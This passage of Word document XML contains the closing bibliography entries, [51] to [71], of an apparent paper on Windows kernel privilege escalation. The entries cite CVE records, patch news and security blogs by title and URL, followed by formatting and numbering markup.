        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:t>[51] CVE Details Database, “CVE-2025-62215: Windows Kernel Elevation of Privilege,” 2025. [Online]. Available: https://www.cvedetails.com/cve/CVE-202562215/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6204535D" w14:textId="77777777" w:rsidR="00825B8C" w:rsidRDefault="00825B8C" w:rsidP="00825B8C">
      <w:pPr>
        <w:spacing w:after="68"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5AFEF0EC" w14:textId="77777777" w:rsidR="00825B8C" w:rsidRDefault="00825B8C" w:rsidP="00825B8C">
      <w:pPr>
        <w:spacing w:after="68"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[52] </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Fortiguard</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> IPS </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Encyclopedia</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, “MS.Windows.CVE-2025-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>62215.Privilege.Elevation</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>,” 2025. [Online]. Available: https://fortiguard.fortinet.com/encyclopedia/ips/59383</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="016D7B49" w14:textId="77777777" w:rsidR="00825B8C" w:rsidRDefault="00825B8C" w:rsidP="00825B8C">
      <w:pPr>
        <w:spacing w:after="68"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="601F420F" w14:textId="77777777" w:rsidR="00825B8C" w:rsidRDefault="00825B8C" w:rsidP="00825B8C">
      <w:pPr>
        <w:spacing w:after="68"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[53] </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>HelpNetSecurity</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, “Patch Tuesday Microsoft CVE-2025-62215,” 2025. [Online]. Available: https://www.helpnetsecurity.com/2025/11/12/patch-tuesdaymicrosoft-cve-2025-62215/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A362F8A" w14:textId="77777777" w:rsidR="00825B8C" w:rsidRDefault="00825B8C" w:rsidP="00825B8C">
      <w:pPr>
        <w:spacing w:after="68"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BCA8A42" w14:textId="77777777" w:rsidR="00825B8C" w:rsidRDefault="00825B8C" w:rsidP="00825B8C">
      <w:pPr>
        <w:spacing w:after="68"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[54] </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>TheHackerNews</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, “Microsoft Fixes 63 Security Flaws, Including Windows Kernel Zero-Day,” 2025. [Online]. Available: https://thehackernews.com/2025/11/microsoftfixes-63-security-flaws.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="242710F8" w14:textId="77777777" w:rsidR="00825B8C" w:rsidRDefault="00825B8C" w:rsidP="00825B8C">
      <w:pPr>
        <w:spacing w:after="68"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09C2D1D7" w14:textId="77777777" w:rsidR="00825B8C" w:rsidRDefault="00825B8C" w:rsidP="00825B8C">
      <w:pPr>
        <w:spacing w:after="68"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:t>[55] CVE Details, “MS13-053: Vulnerabilities in Windows Kernel-Mode Drivers,” 2025. [Online]. Available: https://www.cvedetails.com/microsoft-bulletin/MS13053/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11F8CD1F" w14:textId="77777777" w:rsidR="00825B8C" w:rsidRDefault="00825B8C" w:rsidP="00825B8C">
      <w:pPr>
        <w:spacing w:after="68"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10E1D197" w14:textId="77777777" w:rsidR="00825B8C" w:rsidRDefault="00825B8C" w:rsidP="00825B8C">
      <w:pPr>
        <w:spacing w:after="68"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:t>[56] CVE Details, “MS15-051: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow RCE,” 2025. [Online]. Available: https://www.cvedetails.com/microsoftbulletin/MS15-051/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42325197" w14:textId="77777777" w:rsidR="00825B8C" w:rsidRDefault="00825B8C" w:rsidP="00825B8C">
      <w:pPr>
        <w:spacing w:after="68"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F70EF7D" w14:textId="77777777" w:rsidR="00825B8C" w:rsidRDefault="00825B8C" w:rsidP="00825B8C">
      <w:pPr>
        <w:spacing w:after="68"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:t>[57] CVE Details, “MS13-101: Vulnerabilities in Windows Kernel-Mode Drivers,” 2025. [Online]. Available: https://www.cvedetails.com/microsoft-bulletin/MS13101/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AA05BE3" w14:textId="77777777" w:rsidR="00825B8C" w:rsidRDefault="00825B8C" w:rsidP="00825B8C">
      <w:pPr>
        <w:spacing w:after="68"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04F1E644" w14:textId="77777777" w:rsidR="00825B8C" w:rsidRDefault="00825B8C" w:rsidP="00825B8C">
      <w:pPr>
        <w:spacing w:after="68"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[58] </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>HackingArticles</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, “Windows Privilege Escalation: Kernel Exploit,” 2025. [Online]. Available: https://www.hackingarticles.in/windows-privilege-escalation-kernelexploit/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F1B672A" w14:textId="77777777" w:rsidR="00825B8C" w:rsidRDefault="00825B8C" w:rsidP="00825B8C">
      <w:pPr>
        <w:spacing w:after="68"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69519364" w14:textId="77777777" w:rsidR="00825B8C" w:rsidRDefault="00825B8C" w:rsidP="00825B8C">
      <w:pPr>
        <w:spacing w:after="68"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[59] </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>HackingArticles</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, “Credential Dumping: SAM,” 2025. [Online]. Available: https://www.hackingarticles.in/credential-dumping-sam/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79905B0F" w14:textId="77777777" w:rsidR="00825B8C" w:rsidRDefault="00825B8C" w:rsidP="00825B8C">
      <w:pPr>
        <w:spacing w:after="68"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="320258B1" w14:textId="77777777" w:rsidR="00825B8C" w:rsidRDefault="00825B8C" w:rsidP="00825B8C">
      <w:pPr>
        <w:spacing w:after="68"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[60] </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>InfoSecWriteups</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, “Escalation of Windows Privilege: Kernel Exploit,” 2022. [Online]. Available: https://infosecwriteups.com/escalation-of-windows-privilegekernel-exploit-bddda00c1ab2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F115D16" w14:textId="77777777" w:rsidR="00825B8C" w:rsidRDefault="00825B8C" w:rsidP="00825B8C">
      <w:pPr>
        <w:spacing w:after="68"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="782CE636" w14:textId="77777777" w:rsidR="00825B8C" w:rsidRDefault="00825B8C" w:rsidP="00825B8C">
      <w:pPr>
        <w:spacing w:after="68"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[61] </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>TroventIO</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Security, “Breaking </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Into</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> the Windows Kernel: A Deep Dive into Exploitation,” 2025. [Online]. Available: https://trovent.io/en/windows-kernelexploitation/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D88A1EC" w14:textId="77777777" w:rsidR="00825B8C" w:rsidRDefault="00825B8C" w:rsidP="00825B8C">
      <w:pPr>
        <w:spacing w:after="68"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DB8C1C3" w14:textId="77777777" w:rsidR="00825B8C" w:rsidRDefault="00825B8C" w:rsidP="00825B8C">
      <w:pPr>
        <w:spacing w:after="68"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[62] </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>NetworkIntelligence</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> AI, “Windows Kernel Exploitation,” 2025. [Online]. Available: https://www.networkintelligence.ai/blogs/windows-kernel-exploitation/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23EE2664" w14:textId="77777777" w:rsidR="00825B8C" w:rsidRDefault="00825B8C" w:rsidP="00825B8C">
      <w:pPr>
        <w:spacing w:after="68"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="024387EC" w14:textId="77777777" w:rsidR="00825B8C" w:rsidRDefault="00825B8C" w:rsidP="00825B8C">
      <w:pPr>
        <w:spacing w:after="68"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:t>[63] Compass Security, “Windows Access Tokens: From Authentication to Exploitation,” 2025. [Online]. Available: https://www.compass-security.com/fileadmin/Research/Presentations/2025_07_Windows_Access_Tokens_From_Authentication_To_Exploitat%E2%80%A6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73C2280C" w14:textId="77777777" w:rsidR="00825B8C" w:rsidRDefault="00825B8C" w:rsidP="00825B8C">
      <w:pPr>
        <w:spacing w:after="68"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A8740DB" w14:textId="77777777" w:rsidR="00825B8C" w:rsidRDefault="00825B8C" w:rsidP="00825B8C">
      <w:pPr>
        <w:spacing w:after="68"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:t>[64] EvsinC33 Security Blog, “Windows Access Tokens: Getting SYSTEM and Demystifying Potato Exploits,” 2022. [Online]. Available: https://eversinc33.com/2022/11/25/windowsaccess-tokens-getting-system-and-demystifying-potato-exploits</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31D00313" w14:textId="77777777" w:rsidR="00825B8C" w:rsidRDefault="00825B8C" w:rsidP="00825B8C">
      <w:pPr>
        <w:spacing w:after="68"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1412D0F0" w14:textId="77777777" w:rsidR="00825B8C" w:rsidRDefault="00825B8C" w:rsidP="00825B8C">
      <w:pPr>
        <w:spacing w:after="68"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[65] </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Snyk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Security Blog, “Kernel Privilege Escalation,” 2020. [Online]. Available: https://snyk.io/blog/kernel-privilege-escalation/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30E64348" w14:textId="77777777" w:rsidR="00825B8C" w:rsidRDefault="00825B8C" w:rsidP="00825B8C">
      <w:pPr>
        <w:spacing w:after="68"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CAFEE90" w14:textId="77777777" w:rsidR="00825B8C" w:rsidRDefault="00825B8C" w:rsidP="00825B8C">
      <w:pPr>
        <w:spacing w:after="68"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[66] </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>HelpNetSecurity</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, “Immersive Labs: Patch Tuesday November 2025 Analysis,” 2025. [Online]. Available: https://www.immersivelabs.com/resources/c7blog/patch-tuesday-november-2025-%E2%80%94-critical-microsoft-security-patchesreleased-for-p%E2%80%A6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="545FAFC7" w14:textId="77777777" w:rsidR="00825B8C" w:rsidRDefault="00825B8C" w:rsidP="00825B8C">
      <w:pPr>
        <w:spacing w:after="68"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75E7383C" w14:textId="77777777" w:rsidR="00825B8C" w:rsidRDefault="00825B8C" w:rsidP="00825B8C">
      <w:pPr>
        <w:spacing w:after="68"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[67] </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Picus</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Security, “MITRE ATT&amp;CK T1003: Credential Dumping,” 2020. [Online]. Available: https://www.picussecurity.com/resource/blog/picus-10-criticalmitre-attck-techniques-t1003-credential-dumping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="426558EC" w14:textId="77777777" w:rsidR="00825B8C" w:rsidRDefault="00825B8C" w:rsidP="00825B8C">
      <w:pPr>
        <w:spacing w:after="68"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45112AC7" w14:textId="77777777" w:rsidR="00825B8C" w:rsidRDefault="00825B8C" w:rsidP="00825B8C">
      <w:pPr>
        <w:spacing w:after="68"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[68] </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Picus</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Security, “Microsoft Active Directory Domain Services CVE-2025-21293 Vulnerability Explained,” 2025. [Online]. Available: https://www.picussecurity.com/resource/blog/microsoftactive-directory-domain-services-cve-2025-21293-vulnerability-explained</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EA2F45A" w14:textId="77777777" w:rsidR="00825B8C" w:rsidRDefault="00825B8C" w:rsidP="00825B8C">
      <w:pPr>
        <w:spacing w:after="68"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C84F54B" w14:textId="77777777" w:rsidR="00825B8C" w:rsidRDefault="00825B8C" w:rsidP="00825B8C">
      <w:pPr>
        <w:spacing w:after="68"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[69] </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>CyberSRCC</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, “Privilege Escalation Flaw Found in Windows Active Directory Domain Services,” 2025. [Online]. Available: https://cybersrcc.com/2025/04/11/privilegeescalation-flaw-found-in-windows-active-directory-domain-services/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C2F47E" w14:textId="77777777" w:rsidR="00825B8C" w:rsidRDefault="00825B8C" w:rsidP="00825B8C">
      <w:pPr>
        <w:spacing w:after="68"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="492A7318" w14:textId="77777777" w:rsidR="00825B8C" w:rsidRDefault="00825B8C" w:rsidP="00825B8C">
      <w:pPr>
        <w:spacing w:after="68"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:t>[70] Fortinet Threat Research, “CVE-2020-0796: Memory Corruption Vulnerability in Windows 10 SMB Server,” 2020. [Online]. Available: https://www.fortinet.com/blog/threatresearch/cve-2020-0796-memory-corruption-vulnerability-in-windows-10-smbserver</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C8E3A14" w14:textId="77777777" w:rsidR="00825B8C" w:rsidRDefault="00825B8C" w:rsidP="00825B8C">
      <w:pPr>
        <w:spacing w:after="68"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08433F4C" w14:textId="775713B6" w:rsidR="00FC7A97" w:rsidRDefault="00825B8C" w:rsidP="00825B8C">
      <w:pPr>
        <w:spacing w:after="68"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:t>[71] Security.com Threat Intelligence, “Ransomware Attackers Leveraged Privilege Escalation Zero-Day,” 2025. [Online]. Available: https://www.security.com/threatintelligence/play-ransomware-zero-day</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00FC7A97" w:rsidSect="00AD5226">
      <w:footerReference w:type="even" r:id="rId7"/>
      <w:footerReference w:type="default" r:id="rId8"/>
      <w:footerReference w:type="first" r:id="rId9"/>
      <w:pgSz w:w="12240" w:h="15840"/>
      <w:pgMar w:top="1440" w:right="1080" w:bottom="1440" w:left="1080" w:header="720" w:footer="174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6837D" w14:textId="77777777" w:rsidR="004A4D63" w:rsidRDefault="004A4D63">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="464EA002" w14:textId="77777777" w:rsidR="004A4D63" w:rsidRDefault="004A4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64C8" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
    <w:pPr>
      <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
      <w:ind w:left="0" w:right="1782"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9C1D8" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
    <w:pPr>
      <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
      <w:ind w:left="0" w:right="1782"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0B1C7" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
    <w:pPr>
      <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
      <w:ind w:left="0" w:right="1782"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EF687" w14:textId="77777777" w:rsidR="004A4D63" w:rsidRDefault="004A4D63">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="4C55F258" w14:textId="77777777" w:rsidR="004A4D63" w:rsidRDefault="004A4D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222B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="18A4A4CE"/>
    <w:lvl w:ilvl="0" w:tplc="07885EBA">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>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AE217D0">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7EC0AE">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4C0B6A">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723EA6">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7AFB5A">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649A04">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0AC812">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82CCD4">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5B4DD7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E4644ECA"/>
    <w:lvl w:ilvl="0" w:tplc="21F2C46E">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>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4A6E7E">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64ACFC">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F433B2">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18AB9D0">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C2AA86">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4A5594">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C48DA8">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DE305A">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693DD3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0EA405CA"/>
    <w:lvl w:ilvl="0" w:tplc="4E707E1E">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>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7E01B0">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F4C8BE">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98B730">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112D0BC">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74573A">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6E1126">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C294DC">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B1A4886">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3C581C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D5A47834"/>
    <w:lvl w:ilvl="0" w:tplc="CBECC910">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>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2E290C">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451BC">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5725516">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F1E553A">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C601C8E">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30CD16">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B308580">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48BC80">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4C4A7E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="264A523C"/>
    <w:lvl w:ilvl="0" w:tplc="4BAA0B98">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>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78B3CE">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="13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B2E63C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="20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96FA70">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="27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80FA3C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="35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04017C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="42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2644D2C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="49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BEF98A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="56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D84C32">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6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CC0907"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E424C0B6"/>
    <w:lvl w:ilvl="0" w:tplc="96FE0DEC">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>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4E244E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="13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522830">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2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B41D0C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="27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A29818">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="34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70B594">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="42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D207A4">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="49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DA6E0E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="56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7848C8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="63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0C9659D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0D1A030E"/>
    <w:lvl w:ilvl="0" w:tplc="7F60E7C8">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>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3E8A32">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58676A">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12008C">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684962">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02122A">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389372">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0E94A8">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74817E">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9A36433"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8EDE6566"/>
    <w:lvl w:ilvl="0" w:tplc="F7AAEAFE">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="372" w:hanging="36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8" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="407F164F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="17986B84"/>
    <w:lvl w:ilvl="0" w:tplc="36049AE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0E6590A">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1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14CECA8">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1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2A4B39E">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2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3465CA0">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3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C008A4">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3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CAEACA6">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4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2F46E82">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5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D4AC626">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6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12F6979"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="268896A4"/>
    <w:lvl w:ilvl="0" w:tplc="A43E5772">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>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5E80F0">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="13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8E8EDE">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="20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FA7F9C">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="27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7064BE">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3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C8AA998">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4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009A3E">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
